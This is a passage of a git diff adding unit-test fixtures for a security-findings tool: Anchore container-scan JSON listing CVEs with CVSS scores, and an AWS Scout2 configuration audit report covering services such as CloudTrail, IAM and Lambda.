root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.", + "id": "CVE-2020-13776", + "link": "https://access.redhat.com/security/cve/CVE-2020-13776", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": true + }, + "base_metrics": { + "access_complexity": "HIGH", + "access_vector": "LOCAL", + "authentication": "NONE", + "availability_impact": "COMPLETE", + "base_score": 6.2, + "confidentiality_impact": "COMPLETE", + "exploitability_score": 1.9, + "impact_score": 10, + "integrity_impact": "COMPLETE" + }, + "severity": "Medium", + "vector_string": "AV:L/AC:H/Au:N/C:C/I:C/A:C", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "LOCAL", + "availability_impact": "HIGH", + "base_score": 6.7, + "base_severity": "Medium", + "confidentiality_impact": "HIGH", + "exploitability_score": 0.8, + "impact_score": 5.9, + "integrity_impact": "HIGH", + "privileges_required": "LOW", + "scope": "UNCHANGED", + "user_interaction": "REQUIRED" + }, + "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "id": "CVE-2020-13776" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + } + ], + "vulnerability_type": "all", + "imageFullTag": "registry1.dsop.io/ironbank-staging/cloudbees/core/agent:152299" +} diff --git a/unittests/scans/anchore/no_vuln.json b/unittests/scans/anchore/no_vuln.json new file mode 100644 index 00000000000..ad5d48e6c8a --- /dev/null +++ b/unittests/scans/anchore/no_vuln.json @@ -0,0 +1,5 @@ +{ + "imageDigest": "sha256:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", + "vulnerabilities": [ ], + "vulnerability_type": "os" +} diff --git a/unittests/scans/anchore/one_vuln.json b/unittests/scans/anchore/one_vuln.json new file mode 100644 index 00000000000..2bee35d4d71 --- /dev/null +++ b/unittests/scans/anchore/one_vuln.json @@ -0,0 +1,20 @@ +{ + "imageDigest": "sha256:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", + "vulnerabilities": [ + { + "feed": "vulnerabilities", + "feed_group": "debian:9", + "fix": "None", + "package": "libgnutls30-3.5.8-5+deb9u4", + "package_cpe": "None", + "package_name": "libgnutls30", + "package_path": "None", + "package_type": "dpkg", + "package_version": "3.5.8-5+deb9u4", + "severity": "Medium", + "url": "https://security-tracker.debian.org/tracker/CVE-2011-3389", + "vuln": "CVE-2011-3389" + } + ], + "vulnerability_type": "os" +} diff --git a/unittests/scans/anchore/one_vuln_many_files.json b/unittests/scans/anchore/one_vuln_many_files.json new file mode 100644 index 00000000000..60aeff16d24 --- /dev/null +++ b/unittests/scans/anchore/one_vuln_many_files.json @@ -0,0 +1,130 @@ +{ + "imageDigest": "sha256:91f5c377c6b3c8eabe4112057f71794a648fc7d88e06336384fb4ea1042a2dee", + "vulnerabilities": [ + { + "feed": "nvdv2", + "feed_group": "nvdv2:cves", + "fix": "None", + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10.0, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "CVE-2005-3906" + } + ], + "package": "jdk-1.4", + "package_cpe": "cpe:/a:-:jdk:1.4:-:-", + "package_cpe23": "cpe:2.3:a:-:jdk:1.4:-:-:-:-:-:-:-", + "package_name": "jdk", + "package_path": "/usr/share/contoso-petstore/contoso-petstore.war:WEB-INF/deployed-addons/jdk-tool.hpi", + "package_type": "java", + "package_version": "1.4", + "severity": "High", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3906", + "vendor_data": [], + "vuln": "CVE-2005-3906" + }, + { + "feed": "nvdv2", + "feed_group": "nvdv2:cves", + "fix": "None", + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10.0, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "CVE-2005-3906" + } + ], + "package": "jdk-1.4", + "package_cpe": "cpe:/a:-:jdk:1.4:-:-", + "package_cpe23": "cpe:2.3:a:-:jdk:1.4:-:-:-:-:-:-:-", + "package_name": "jdk", + "package_path": "/usr/share/contoso-petstore/contoso-petstore.war:WEB-INF/deployed-addons/jdk-tool.hpi:WEB-INF/lib/jdk-tool.jar", + "package_type": "java", + "package_version": "1.4", + "severity": "High", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3906", + "vendor_data": [], + "vuln": "CVE-2005-3906" + }, + { + "feed": "nvdv2", + "feed_group": "nvdv2:cves", + "fix": "None", + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10.0, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "CVE-2005-3906" + } + ], + "package": "jdk-1.4", + "package_cpe": "cpe:/a:-:jdk:1.4:-:-", + "package_cpe23": "cpe:2.3:a:-:jdk:1.4:-:-:-:-:-:-:-", + "package_name": "jdk", + "package_path": "/usr/share/contoso-petstore/contoso-petstore.war:WEB-INF/addons/jdk-tool.hpi", + "package_type": "java", + "package_version": "1.4", + "severity": "High", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3906", + "vendor_data": [], + "vuln": "CVE-2005-3906" + }, + { + "feed": "nvdv2", + "feed_group": "nvdv2:cves", + "fix": "None", + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10.0, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": -1.0, + "exploitability_score": -1.0, + "impact_score": -1.0 + }, + "id": "CVE-2005-3906" + } + ], + "package": "jdk-1.4", + "package_cpe": "cpe:/a:-:jdk:1.4:-:-", + "package_cpe23": "cpe:2.3:a:-:jdk:1.4:-:-:-:-:-:-:-", + "package_name": "jdk", + "package_path": "/usr/share/contoso-petstore/contoso-petstore.war:WEB-INF/addons/jdk-tool.hpi:WEB-INF/lib/jdk-tool.jar", + "package_type": "java", + "package_version": "1.4", + "severity": "High", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3906", + "vendor_data": [], + "vuln": "CVE-2005-3906" + } + ], + "vulnerability_type": "all" +} diff --git a/unittests/scans/aws_scout2/aws_config.js b/unittests/scans/aws_scout2/aws_config.js new file mode 100644 index 00000000000..6dc862a7ce0 --- /dev/null +++ b/unittests/scans/aws_scout2/aws_config.js @@ -0,0 +1,2 @@ +aws_info = +{"aws_account_id": "430150006394","last_run": {"cmd": "/home/damien/dd/.venv/bin/Scout2","ruleset_about": "This ruleset consists of numerous rules that are considered standard by the project's maintainers in an effort to avoid false-positive warnings. The rules enabled range from violations of well-known security best practices to gaps resulting from less-known security implications of AWS-specific mechanisms. Additional rules exist, some of them requiring extra-parameters to be configured, and some of them being applicable to a limited number of users. Consider using the RulesetGenerator tool to make the most of Scout2.","ruleset_name": "default","summary": {"awslambda": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 1,"rules_count": 0},"cloudformation": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 1},"cloudtrail": {"checked_items": 22,"flagged_items": 21,"max_level": "danger","resources_count": 0,"rules_count": 5},"cloudwatch": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 1},"directconnect": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 0},"ec2": {"checked_items": 653,"flagged_items": 83,"max_level": "danger","resources_count": 20,"rules_count": 23},"efs": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 0},"elasticache": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 0},"elb": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 1},"elbv2": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 3},"emr": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 0},"iam": {"checked_items": 80,"flagged_items": 10,"max_level": "danger","resources_count": 19,"rules_count": 31},"rds": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 17,"rules_count": 7},"redshift": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 6},"route53": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 3},"s3": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 19},"ses": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 2},"sns": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 7},"sqs": {"checked_items": 0,"flagged_items": 0,"max_level": "warning","resources_count": 0,"rules_count": 7},"vpc": {"checked_items": 250,"flagged_items": 199,"max_level": "warning","resources_count": 106,"rules_count": 8}},"time": "2021-03-19 13:32:13+0100","version": "3.2.1"},"metadata": {"analytics": {"emr": {"resources": {"clusters": {"api_call": "list_clusters","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "","sg_list_attribute_name": ["Ec2InstanceAttributes","EmrManagedMasterSecurityGroup"],"status_path": ["Status","State"]}],["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "","sg_list_attribute_name": ["Ec2InstanceAttributes","EmrManagedSlaveSecurityGroup"],"status_path": ["Status","State"]}]],"cols": 2,"count": 0,"full_path": "services.emr.regions.id.vpcs.id.clusters","path": "services.emr.regions.id.vpcs.id.clusters","response": "Clusters","script": "services.emr.regions.vpcs.clusters"}}}},"compute": {"awslambda": {"resources": {"functions": {"api_call": "list_functions","callbacks": [["match_security_groups_and_resources_callback",{"sg_list_attribute_name": ["VpcConfig","SecurityGroupIds"],"status_path": ["Runtime"]}]],"count": 1,"full_path": "services.awslambda.regions.id.functions","path": "services.awslambda.regions.id.functions","response": "Functions","script": "services.awslambda.regions.functions"}}},"ec2": {"resources": {"instances": {"api_call": "describe_instances","callbacks": [["match_instances_and_subnets_callback",{}]],"cols": 2,"count": 0,"full_path": "services.ec2.regions.id.vpcs.id.instances","path": "services.ec2.regions.id.vpcs.id.instances","response": "Reservations","script": "services.ec2.regions.vpcs.instances"},"network_interfaces": {"api_call": "describe_network_interfaces","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "GroupId","sg_list_attribute_name": ["Groups"]}]],"count": 0,"full_path": "services.ec2.regions.id.vpcs.id.network_interfaces","hidden": true,"path": "services.ec2.regions.id.vpcs.id.network_interfaces","response": "NetworkInterfaces","script": "services.ec2.regions.vpcs.network_interfaces"},"security_groups": {"api_call": "describe_security_groups","cols": 2,"count": 20,"full_path": "services.ec2.regions.id.vpcs.id.security_groups","path": "services.ec2.regions.id.vpcs.id.security_groups","response": "SecurityGroups","script": "services.ec2.regions.vpcs.security_groups"},"snapshots": {"api_call": "describe_snapshots","cols": 2,"count": 0,"full_path": "services.ec2.regions.id.snapshots","params": {"OwnerIds": ["430150006394"]},"path": "services.ec2.regions.id.snapshots","response": "Snapshots","script": "services.ec2.regions.snapshots"},"volumes": {"api_call": "describe_volumes","cols": 2,"count": 0,"full_path": "services.ec2.regions.id.volumes","path": "services.ec2.regions.id.volumes","response": "Volumes","script": "services.ec2.regions.volumes"}},"summaries": {"external attack surface": {"callbacks": [["list_ec2_network_attack_surface_callback",{"path": "services.ec2.regions.id.vpcs.id.instances.id.network_interfaces.id.PrivateIpAddresses"}]],"cols": 1,"path": "services.ec2.external_attack_surface"}}},"elb": {"resources": {"elb_policies": {"cols": 2,"count": 0,"full_path": "services.elb.regions.id.elb_policies","path": "services.elb.regions.id.elb_policies","script": "services.elb.regions.elb_policies"},"elbs": {"api_call": "describe_load_balancers","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "GroupId","sg_list_attribute_name": ["security_groups"],"status_path": ["Scheme"]}],["get_lb_attack_surface",{}]],"cols": 2,"count": 0,"full_path": "services.elb.regions.id.vpcs.id.elbs","path": "services.elb.regions.id.vpcs.id.elbs","response": "LoadBalancerDescriptions","script": "services.elb.regions.vpcs.elbs"}},"summaries": {"external attack surface": {"cols": 1,"path": "services.elb.external_attack_surface"}}},"elbv2": {"resources": {"lbs": {"api_call": "describe_load_balancers","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "GroupId","sg_list_attribute_name": ["security_groups"],"status_path": ["State","Code"]}],["get_lb_attack_surface",{}]],"cols": 2,"count": 0,"full_path": "services.elbv2.regions.id.vpcs.id.lbs","path": "services.elbv2.regions.id.vpcs.id.lbs","response": "LoadBalancers","script": "services.elbv2.regions.vpcs.lbs"},"ssl_policies": {"api_call": "describe_ssl_policies","count": 0,"full_path": "services.elbv2.ssl_policies","hidden": true,"path": "services.elbv2.ssl_policies","response": "SslPolicies","script": "services.elbv2.ssl_policies"}},"summaries": {"external attack surface": {"cols": 1,"path": "services.elbv2.external_attack_surface"}}},"summaries": {"external attack surface": {"callbacks": [["merge",{"attribute": "external_attack_surface"}]],"cols": 1,"path": "service_groups.compute.summaries.external_attack_surface"}}},"database": {"elasticache": {"resources": {"clusters": {"api_call": "describe_cache_clusters","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "SecurityGroupId","sg_list_attribute_name": ["SecurityGroups"],"status_path": ["CacheClusterStatus"]}],["get_db_attack_surface",{}]],"cols": 2,"count": 0,"full_path": "services.elasticache.regions.id.vpcs.id.clusters","path": "services.elasticache.regions.id.vpcs.id.clusters","response": "CacheClusters","script": "services.elasticache.regions.vpcs.clusters"},"parameter_groups": {"api_to_call": "describe_db_parameter_groups","cols": 2,"count": 0,"full_path": "services.elasticache.regions.id.parameter_groups","path": "services.elasticache.regions.id.parameter_groups","response": "DBParameterGroups","script": "services.elasticache.regions.parameter_groups"},"security_groups": {"api_call": "describe_cache_security_groups","cols": 2,"count": 0,"full_path": "services.elasticache.regions.id.security_groups","no_exceptions": true,"path": "services.elasticache.regions.id.security_groups","response": "CacheSecurityGroups","script": "services.elasticache.regions.security_groups"},"subnet_groups": {"cols": 2,"count": 0,"full_path": "services.elasticache.regions.id.vpcs.id.subnet_groups","path": "services.elasticache.regions.id.vpcs.id.subnet_groups","script": "services.elasticache.regions.vpcs.subnet_groups"}}},"rds": {"resources": {"instances": {"api_call": "describe_db_instances","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "VpcSecurityGroupId","sg_list_attribute_name": ["VpcSecurityGroups"],"status_path": ["DBInstanceStatus"]}],["get_db_attack_surface",{}]],"cols": 2,"count": 0,"full_path": "services.rds.regions.id.vpcs.id.instances","path": "services.rds.regions.id.vpcs.id.instances","response": "DBInstances","script": "services.rds.regions.vpcs.instances"},"parameter_groups": {"api_call": "describe_db_parameter_groups","cols": 2,"count": 0,"full_path": "services.rds.regions.id.parameter_groups","path": "services.rds.regions.id.parameter_groups","response": "DBParameterGroups","script": "services.rds.regions.parameter_groups"},"security_groups": {"api_call": "describe_db_security_groups","cols": 2,"count": 17,"full_path": "services.rds.regions.id.security_groups","no_exceptions": true,"path": "services.rds.regions.id.security_groups","response": "DBSecurityGroups","script": "services.rds.regions.security_groups"},"snapshots": {"api_call": "describe_db_snapshots","cols": 2,"count": 0,"full_path": "services.rds.regions.id.vpcs.id.snapshots","path": "services.rds.regions.id.vpcs.id.snapshots","response": "DBSnapshots","script": "services.rds.regions.vpcs.snapshots"},"subnet_groups": {"api_call": "describe_db_subnet_groups","cols": 2,"count": 0,"full_path": "services.rds.regions.id.vpcs.id.subnet_groups","path": "services.rds.regions.id.vpcs.id.subnet_groups","response": "DBSubnetGroups","script": "services.rds.regions.vpcs.subnet_groups"}},"summaries": {"external attack surface": {"cols": 1,"path": "services.rds.external_attack_surface"}}},"redshift": {"resources": {"clusters": {"api_call": "describe_clusters","callbacks": [["match_security_groups_and_resources_callback",{"sg_id_attribute_name": "VpcSecurityGroupId","sg_list_attribute_name": ["VpcSecurityGroups"],"status_path": ["ClusterStatus"]}],["get_db_attack_surface",{}]],"cols": 2,"count": 0,"full_path": "services.redshift.regions.id.vpcs.id.clusters","path": "services.redshift.regions.id.vpcs.id.clusters","response": "Clusters","script": "services.redshift.regions.vpcs.clusters"},"parameter_groups": {"api_call": "describe_cluster_parameter_groups","cols": 2,"count": 0,"full_path": "services.redshift.regions.id.parameter_groups","path": "services.redshift.regions.id.parameter_groups","response": "ParameterGroups","script": "services.redshift.regions.parameter_groups"},"security_groups": {"api_call": "describe_cluster_security_groups","cols": 2,"count": 0,"full_path": "services.redshift.regions.id.security_groups","no_exceptions": true,"path": "services.redshift.regions.id.security_groups","response": "ClusterSecurityGroups","script": "services.redshift.regions.security_groups"}},"summaries": {"external attack surface": {"cols": 1,"path": "services.redshift.external_attack_surface"}}},"summaries": {"external attack surface": {"callbacks": [["merge",{"attribute": "external_attack_surface"}]],"cols": 1,"path": "service_groups.database.summaries.external_attack_surface"}}},"management": {"cloudformation": {"resources": {"stacks": {"api_call": "describe_stacks","callbacks": [["match_roles_and_cloudformation_stacks_callback",{}]],"cols": 2,"count": 0,"full_path": "services.cloudformation.regions.id.stacks","path": "services.cloudformation.regions.id.stacks","response": "Stacks","script": "services.cloudformation.regions.stacks"}}},"cloudtrail": {"resources": {"regions": {"cols": 2,"full_path": "services.cloudtrail.regions","path": "services.cloudtrail.regions","script": "services.cloudtrail.regions"},"trails": {"api_call": "describe_trails","cols": 2,"count": 0,"full_path": "services.cloudtrail.regions.id.trails","path": "services.cloudtrail.regions.id.trails","response": "trailList","script": "services.cloudtrail.regions.trails"}}},"cloudwatch": {"resources": {"alarms": {"api_call": "describe_alarms","cols": 2,"count": 0,"full_path": "services.cloudwatch.regions.id.alarms","path": "services.cloudwatch.regions.id.alarms","response": "MetricAlarms","script": "services.cloudwatch.regions.alarms"}},"summaries": {"statistics": {"cols": 1,"path": "services.cloudwatch.statistics"}}}},"messaging": {"ses": {"resources": {"identities": {"api_call": "list_identities","cols": 2,"count": 0,"full_path": "services.ses.regions.id.identities","path": "services.ses.regions.id.identities","response": "Identities","script": "services.ses.regions.identities"}}},"sns": {"resources": {"subscriptions": {"api_call": "list_subscriptions","count": 0,"full_path": "services.sns.regions.id.subscriptions","hidden": true,"path": "services.sns.regions.id.subscriptions","response": "Subscriptions","script": "services.sns.regions.subscriptions"},"topics": {"api_call": "list_topics","cols": 2,"count": 0,"full_path": "services.sns.regions.id.topics","path": "services.sns.regions.id.topics","response": "Topics","script": "services.sns.regions.topics"}}},"sqs": {"resources": {"queues": {"api_call": "list_queues","cols": 2,"count": 0,"full_path": "services.sqs.regions.id.queues","path": "services.sqs.regions.id.queues","response": "QueueUrls","script": "services.sqs.regions.queues"}}}},"network": {"directconnect": {"resources": {"connections": {"api_call": "describe_connections","cols": 2,"count": 0,"full_path": "services.directconnect.connections","path": "services.directconnect.connections","response": "connections","script": "services.directconnect.connections"}}},"route53": {"resources": {"domains": {"cols": 2,"count": 0,"full_path": "services.route53.domains","path": "services.route53.domains","script": "services.route53.domains"},"hosted_zones": {"cols": 2,"count": 0,"full_path": "services.route53.hosted_zones","path": "services.route53.hosted_zones","script": "services.route53.hosted_zones"}}},"vpc": {"resources": {"customer_gateways": {"api_call": "describe_customer_gateways","cols": 2,"count": 0,"full_path": "services.vpc.regions.id.customer_gateways","path": "services.vpc.regions.id.customer_gateways","response": "CustomerGateways","script": "services.vpc.regions.customer_gateways"},"flow_logs": {"api_call": "describe_flow_logs","callbacks": [["sort_vpc_flow_logs_callback",{}],["match_roles_and_vpc_flowlogs_callback",{}]],"count": 0,"full_path": "services.vpc.regions.id.flow_logs","hidden": true,"path": "services.vpc.regions.id.flow_logs","response": "FlowLogs","script": "services.vpc.regions.flow_logs"},"network_acls": {"api_call": "describe_network_acls","callbacks": [["match_network_acls_and_subnets_callback",{}],["process_network_acls_callback",{}]],"cols": 2,"count": 17,"full_path": "services.vpc.regions.id.vpcs.id.network_acls","path": "services.vpc.regions.id.vpcs.id.network_acls","response": "NetworkAcls","script": "services.vpc.regions.vpcs.network_acls"},"peering_connections": {"api_call": "describe_vpc_peering_connections","callbacks": [["process_vpc_peering_connections_callback",{}]],"count": 0,"full_path": "services.vpc.regions.id.peering_connections","hidden": true,"path": "services.vpc.regions.id.peering_connections","response": "VpcPeeringConnections","script": "services.vpc.regions.peering_connections"},"route_tables": {"api_call": "describe_route_tables","count": 17,"full_path": "services.vpc.regions.id.vpcs.id.route_tables","hidden": true,"path": "services.vpc.regions.id.vpcs.id.route_tables","response": "RouteTables","script": "services.vpc.regions.vpcs.route_tables"},"subnets": {"api_call": "describe_subnets","cols": 2,"count": 55,"full_path": "services.vpc.regions.id.vpcs.id.subnets","path": "services.vpc.regions.id.vpcs.id.subnets","response": "Subnets","script": "services.vpc.regions.vpcs.subnets"},"vpcs": {"api_call": "describe_vpcs","cols": 2,"count": 17,"full_path": "services.vpc.regions.id.vpcs","path": "services.vpc.regions.id.vpcs","response": "Vpcs","script": "services.vpc.regions.vpcs"},"vpn_connections": {"api_call": "describe_vpn_connections","cols": 2,"count": 0,"full_path": "services.vpc.regions.id.vpn_connections","path": "services.vpc.regions.id.vpn_connections","response": "VpnConnections","script": "services.vpc.regions.vpn_connections"},"vpn_gateways": {"api_call": "describe_vpn_gateways","cols": 2,"count": 0,"full_path": "services.vpc.regions.id.vpn_gateways","path": "services.vpc.regions.id.vpn_gateways","response": "VpnGateways","script": "services.vpc.regions.vpn_gateways"}}}},"security": {"iam": {"resources": {"groups": {"cols": 2,"count": 1,"full_path": "services.iam.groups","path": "services.iam.groups","script": "services.iam.groups"},"policies": {"cols": 2,"count": 8,"full_path": "services.iam.policies","path": "services.iam.policies","script": "services.iam.policies"},"roles": {"cols": 2,"count": 7,"full_path": "services.iam.roles","path": "services.iam.roles","script": "services.iam.roles"},"users": {"cols": 2,"count": 1,"full_path": "services.iam.users","path": "services.iam.users","script": "services.iam.users"}},"summaries": {"password_policy": {"cols": 1,"path": "services.iam.password_policy"},"permissions": {"cols": 1,"path": "services.iam.permissions"},"root_account": {"cols": 1,"path": "services.iam.credential_report."}}}},"storage": {"efs": {"hidden": true,"resources": {"file_systems": {"api_call": "describe_file_systems","callbacks": [["match_security_groups_and_resources_callback",{"sg_list_attribute_name": ["security_groups"],"status_path": ["LifeCycleState"]}]],"path": "services.efs.regions.id.file_systems","response": "FileSystems"}}},"s3": {"resources": {"buckets": {"cols": 2,"count": 0,"full_path": "services.s3.buckets","path": "services.s3.buckets","script": "services.s3.buckets"}}}}},"service_groups": {"compute": {"summaries": {"external_attack_surface": {}}},"database": {"summaries": {"external_attack_surface": {}}}},"service_list": ["cloudformation","cloudtrail","cloudwatch","directconnect","ec2","efs","elasticache","elb","elbv2","emr","iam","awslambda","redshift","rds","route53","route53domains","s3","ses","sns","sqs","vpc"],"services": {"awslambda": {"filters": {},"findings": {},"functions_count": 1,"regions": {"af-south-1": {"functions": {},"functions_count": 0,"region": "af-south-1"},"ap-east-1": {"functions": {},"functions_count": 0,"region": "ap-east-1"},"ap-northeast-1": {"functions": {},"functions_count": 0,"region": "ap-northeast-1"},"ap-northeast-2": {"functions": {},"functions_count": 0,"region": "ap-northeast-2"},"ap-northeast-3": {"functions": {},"functions_count": 0,"region": "ap-northeast-3"},"ap-south-1": {"functions": {},"functions_count": 0,"region": "ap-south-1"},"ap-southeast-1": {"functions": {},"functions_count": 0,"region": "ap-southeast-1"},"ap-southeast-2": {"functions": {},"functions_count": 0,"region": "ap-southeast-2"},"ca-central-1": {"functions": {},"functions_count": 0,"region": "ca-central-1"},"eu-central-1": {"functions": {},"functions_count": 0,"region": "eu-central-1"},"eu-north-1": {"functions": {},"functions_count": 0,"region": "eu-north-1"},"eu-south-1": {"functions": {},"functions_count": 0,"region": "eu-south-1"},"eu-west-1": {"functions": {"load-wikipedia": {"CodeSha256": "txY7sj38mwfot6uoeqMhNs4P/VycimyJcRBdlDBTyik=","CodeSize": 506,"Description": "","FunctionArn": "arn:aws:lambda:eu-west-1:430150006394:function:load-wikipedia","Handler": "lambda_function.lambda_handler","LastModified": "2019-01-25T17:47:21.038+0000","MemorySize": 128,"PackageType": "Zip","RevisionId": "9ec6c002-9048-4d53-a4c2-001e406827b3","Role": "arn:aws:iam::430150006394:role/service-role/load-wikipedia","Runtime": "python2.7","Timeout": 3,"TracingConfig": {"Mode": "PassThrough"},"Version": "$LATEST","name": "load-wikipedia"}},"functions_count": 1,"region": "eu-west-1"},"eu-west-2": {"functions": {},"functions_count": 0,"region": "eu-west-2"},"eu-west-3": {"functions": {},"functions_count": 0,"region": "eu-west-3"},"me-south-1": {"functions": {},"functions_count": 0,"region": "me-south-1"},"sa-east-1": {"functions": {},"functions_count": 0,"region": "sa-east-1"},"us-east-1": {"functions": {},"functions_count": 0,"region": "us-east-1"},"us-east-2": {"functions": {},"functions_count": 0,"region": "us-east-2"},"us-west-1": {"functions": {},"functions_count": 0,"region": "us-west-1"},"us-west-2": {"functions": {},"functions_count": 0,"region": "us-west-2"}},"regions_count": 21,"resource_types": {"global": [],"region": ["functions"],"vpc": []},"service": "lambda","targets": {"first_region": [["functions","Functions","list_functions",{},false]],"other_regions": [["functions","Functions","list_functions",{},false]]},"thread_config": {"list": 10,"parse": 20}},"cloudformation": {"filters": {},"findings": {"cloudformation-stack-with-role": {"checked_items": 0,"dashboard_name": "Stacks","description": "Role passed to stack","flagged_items": 0,"items": [],"level": "danger","path": "cloudformation.regions.id.stacks.id","rationale": "Passing a role to CloudFormation stacks may result in privilege escalation beause IAM users with privileges within the CloudFormation scope implicitly inherit the stack's role's permissions.","service": "CloudFormation"}},"regions": {"af-south-1": {"region": "af-south-1","stacks": {},"stacks_count": 0},"ap-east-1": {"region": "ap-east-1","stacks": {},"stacks_count": 0},"ap-northeast-1": {"region": "ap-northeast-1","stacks": {},"stacks_count": 0},"ap-northeast-2": {"region": "ap-northeast-2","stacks": {},"stacks_count": 0},"ap-northeast-3": {"region": "ap-northeast-3","stacks": {},"stacks_count": 0},"ap-south-1": {"region": "ap-south-1","stacks": {},"stacks_count": 0},"ap-southeast-1": {"region": "ap-southeast-1","stacks": {},"stacks_count": 0},"ap-southeast-2": {"region": "ap-southeast-2","stacks": {},"stacks_count": 0},"ca-central-1": {"region": "ca-central-1","stacks": {},"stacks_count": 0},"eu-central-1": {"region": "eu-central-1","stacks": {},"stacks_count": 0},"eu-north-1": {"region": "eu-north-1","stacks": {},"stacks_count": 0},"eu-south-1": {"region": "eu-south-1","stacks": {},"stacks_count": 0},"eu-west-1": {"region": "eu-west-1","stacks": {},"stacks_count": 0},"eu-west-2": {"region": "eu-west-2","stacks": {},"stacks_count": 0},"eu-west-3": {"region": "eu-west-3","stacks": {},"stacks_count": 0},"me-south-1": {"region": "me-south-1","stacks": {},"stacks_count": 0},"sa-east-1": {"region": "sa-east-1","stacks": {},"stacks_count": 0},"us-east-1": {"region": "us-east-1","stacks": {},"stacks_count": 0},"us-east-2": {"region": "us-east-2","stacks": {},"stacks_count": 0},"us-west-1": {"region": "us-west-1","stacks": {},"stacks_count": 0},"us-west-2": {"region": "us-west-2","stacks": {},"stacks_count": 0}},"regions_count": 21,"resource_types": {"global": [],"region": ["stacks"],"vpc": []},"service": "cloudformation","stacks_count": 0,"targets": {"first_region": [["stacks","Stacks","describe_stacks",{},false]],"other_regions": [["stacks","Stacks","describe_stacks",{},false]]},"thread_config": {"list": 10,"parse": 20}},"cloudtrail": {"DuplicatedGlobalServiceEvents": false,"IncludeGlobalServiceEvents": false,"data_logging_trails_count": 0,"filters": {},"findings": {"cloudtrail-duplicated-global-services-logging": {"checked_items": 1,"dashboard_name": "Configuration","description": "Global service logging duplicated","flagged_items": 0,"id_suffix": "IncludeGlobalServiceEvents","items": [],"level": "warning","path": "cloudtrail","rationale": "Global service logging is enabled in multiple Trails. While this does not jeopardize the security of the environment, duplicated entries in logs increase the difficulty to investate potential incidents.","service": "CloudTrail"},"cloudtrail-no-global-services-logging": {"checked_items": 1,"dashboard_name": "Configuration","description": "Global services logging disabled","flagged_items": 1,"id_suffix": "IncludeGlobalServiceEvents","items": ["cloudtrail.IncludeGlobalServiceEvents"],"level": "danger","path": "cloudtrail","rationale": "API activity for global services such as IAM and STS is not logged. Investigation of incidents will be incomplete due to the lack of information.","service": "CloudTrail"},"cloudtrail-no-log-file-validation": {"checked_items": 0,"dashboard_name": "Trails","description": "Log file validation disabled","flagged_items": 0,"id_suffix": "LogFileValidationDisabled","items": [],"level": "danger","path": "cloudtrail.regions.id.trails.id","rationale": "The lack of log file validation prevents one from verifying the integrity of the log files.","service": "CloudTrail"},"cloudtrail-no-logging": {"checked_items": 0,"dashboard_name": "Trails","description": "Logging disabled","flagged_items": 0,"id_suffix": "IsLogging","items": [],"level": "danger","path": "cloudtrail.regions.id.trails.id","rationale": "Logging is disabled for a given Trail. Depending on the configuration, logs for important API activity may be missing.","service": "CloudTrail"},"cloudtrail-not-configured": {"checked_items": 20,"dashboard_name": "Regions","description": "Not configured","flagged_items": 20,"id_suffix": "NotConfigured","items": 